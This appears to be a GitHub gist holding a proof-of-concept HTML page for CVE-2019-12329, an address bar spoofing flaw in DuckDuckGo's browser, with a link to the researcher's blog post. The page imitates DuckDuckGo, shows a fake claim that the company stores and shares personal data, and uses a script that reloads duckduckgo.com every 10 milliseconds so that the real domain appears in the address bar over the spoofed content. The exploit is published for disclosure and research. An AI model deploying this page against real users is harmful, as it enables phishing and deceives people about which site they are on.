Skip to content

Instantly share code, notes, and snippets.

@RootUp
Last active October 29, 2022 16:30
Show Gist options
  • Save RootUp/0d7ea43ade16c36b7c96761385271ee3 to your computer and use it in GitHub Desktop.
Save RootUp/0d7ea43ade16c36b7c96761385271ee3 to your computer and use it in GitHub Desktop.
DuckDuckGo Address Bar Spoofing - CVE-2019-12329
<html><body>
<title>DuckDuckGo — Privacy, simplified.</title>
<head><style>
p.b {
font-family: Arial, Helvetica, sans-serif;
}
</style></head><p class="b"><body bgcolor="#5DBCD2">
<h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1>
<p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal
information to 3rd parties.</p>
</p><img src="https://duckduckgo.com/assets/onboarding/bathroomguy/4-alpinist-v2.svg">
<script>
function fakefuntion()
{
location = "https://duckduckgo.com/"
}
setInterval("fakefuntion()", 10);
</script></body></html>
Blog: https://www.inputzero.io/2019/05/duckduckgo-address-bar-spoofing.html
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment